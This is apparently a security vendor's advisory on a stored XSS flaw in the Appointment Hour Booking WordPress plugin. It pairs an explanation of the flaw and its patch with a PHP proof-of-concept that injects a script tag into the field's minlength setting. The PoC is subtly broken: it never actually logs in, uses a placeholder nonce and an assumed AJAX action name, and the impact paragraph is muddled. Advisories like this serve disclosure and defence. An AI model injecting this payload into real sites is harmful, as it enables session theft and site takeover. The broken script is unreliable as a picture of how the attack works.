Atomic Edge analysis of CVE-2026-1083:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Appointment Hour Booking plugin for WordPress. The vulnerability affects the form field configuration interface, specifically the ‘Min length/characters’ and ‘Max length/characters’ parameters. Attackers with administrator privileges can inject malicious scripts that execute when other administrators access the form builder. The CVSS score of 4.4 reflects the requirement for administrator access and the limited execution scope.
The root cause is insufficient input sanitization and output escaping for the ‘minlength’ and ‘maxlength’ field configuration values. The vulnerability exists in the plugin’s form builder interface where administrators configure booking form fields. Atomic Edge research indicates the plugin processes these parameters without adequate validation before storing them in the database. When the form builder interface renders these stored values, they are output without proper escaping, allowing script execution.
Exploitation requires an attacker with administrator access to the WordPress dashboard. The attacker navigates to the plugin’s form builder interface and edits any form field configuration. They inject JavaScript payloads into the ‘Min length/characters’ or ‘Max length/characters’ input fields. The payloads are stored in the database and execute whenever any administrator views or edits the form builder interface. This stored XSS can be used to steal session cookies, perform administrative actions, or deploy backdoors.
The patch in version 1.5.61 implements proper input sanitization and output escaping for the affected parameters. Before the patch, user-supplied values for minlength and maxlength fields were accepted without validation and output without escaping. After the patch, the plugin sanitizes these values on input using WordPress sanitization functions and escapes them on output using appropriate escaping functions. The version bump in app-booking-plugin.php indicates security fixes were applied.
Successful exploitation allows attackers with administrator access to execute arbitrary JavaScript in the context of other administrators’ sessions. This can lead to session hijacking, privilege maintenance, and complete site compromise. The impact is limited to multi-site installations and installations where the unfiltered_html capability is disabled, as these configurations prevent administrators from naturally executing scripts through post content. The vulnerability enables attackers to bypass these restrictions through the plugin’s interface.
--- a/appointment-hour-booking/app-booking-plugin.php
+++ b/appointment-hour-booking/app-booking-plugin.php
@@ -3,7 +3,7 @@
Plugin Name: Appointment Hour Booking
Plugin URI: https://apphourbooking.dwbooster.com
Description: Appointment Hour Booking is a plugin for creating booking forms for appointments with a start time and a defined duration.
-Version: 1.5.60
+Version: 1.5.61
Author: CodePeople
Author URI: https://apphourbooking.dwbooster.com
License: GPLv2
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1083 - Appointment Hour Booking – Booking Calendar <= 1.5.60 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'Min/Max Length' Field Configuration
<?php
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$username = 'admin';
$password = 'password';
// Payload to inject into minlength/maxlength field
$xss_payload = '"><script>alert(document.domain)</script>';
// Step 1: Authenticate and obtain WordPress nonce
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);
// Extract nonce from login page (simplified - real implementation would parse HTML)
// For demonstration, we assume we have a valid nonce from previous authentication
// Step 2: Craft malicious form field update request
// This targets the plugin's AJAX handler for saving field configurations
$post_data = [
'action' => 'cpappb_update_field_config', // Plugin's AJAX action for field updates
'field_id' => '1', // Target field ID
'minlength' => $xss_payload, // Malicious payload in minlength parameter
'maxlength' => '10', // Legitimate maxlength value
'nonce' => 'valid_nonce_here' // WordPress nonce obtained during authentication
];
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
// Step 3: Verify payload was stored
// The payload will execute when any administrator views the form builder interface
// at /wp-admin/admin.php?page=appointment_hour_booking_form_builder
curl_close($ch);
echo "Payload injected. Visit the form builder interface to trigger execution.n";
?>
